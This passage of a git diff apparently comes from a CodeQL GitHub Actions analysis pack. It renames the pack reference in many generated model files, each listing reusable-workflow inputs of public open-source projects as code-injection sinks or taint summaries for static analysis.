b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index c89d1c808c3..546dac977a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 0258c79e83f..3a072fd9f07 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index ebeba1eb226..08a5f8fc58e 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 5f709385839..299c70daa54 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e96dbba0699..3e03b65cb8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 2a7a9afd5a6..20eb977b973 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5094422f3fe..4e58b2fa38c 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index dff83745645..6935bc7788d 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 88b68dc4ea7..94d733fa0c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 18c6974c74f..6b1214886fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 561c3e15e64..4a97c50ad6e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 961741f413f..a6e4c3473f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 985652a265b..be72ba18357 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 3103913ab4f..5f4a4a09cd0 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index b89c1307d2d..4cadb751d75 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 9e60cc61bb5..1257c67c180 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cac4e298538..f0daee8757e 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index eb2669a96ea..85d3b564a78 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 590e518d350..01bda56c9a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index d55af595b1c..4c9e9b1dc8f 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 1fd6cd394bc..30e54f94fc1 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 3583052045b..bb0c172bf0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index f355ceee6da..3a5ad21b22a 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 2b9190c87af..c161072bd3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 783ff3c0468..0362312f27a 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index de853d30588..2ae5aab3b2c 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 31f09278ecd..e2c8ae625c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index d45a2e2a03a..13461b60205 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 896400bf2f1..88e02dd04c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index ade06c90c26..2f368497f01 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index f4c2d488ba3..64f3c208540 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 8a11ced42d0..9c2d7a421db 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 4c018b20f22..1410fd6fbe9 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 315c85efeb6..eca441b608a 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 8a3132d5258..2868aecd064 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 9a669c8c009..0aa2d1c596c 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 0ecb817822c..02fe1b2055f 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index e4590eeec8b..9f6401ec03e 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index ea0ddad0697..373b507f2f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9352f766e82..9b68b660586 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index d436644f4ac..ddce9773100 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index c6c01abca90..3aa599e00d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 8a9f76e7e52..4ff3377e6eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 8b3cfebc67b..577ffa78d82 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 9add4859f35..99ff06a4aee 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index efc8097b963..5241bc1bcb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 6a305522cfb..66221185cbd 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 441325c76a5..eb5207528d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 5f0831afc07..1337b0e76ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - 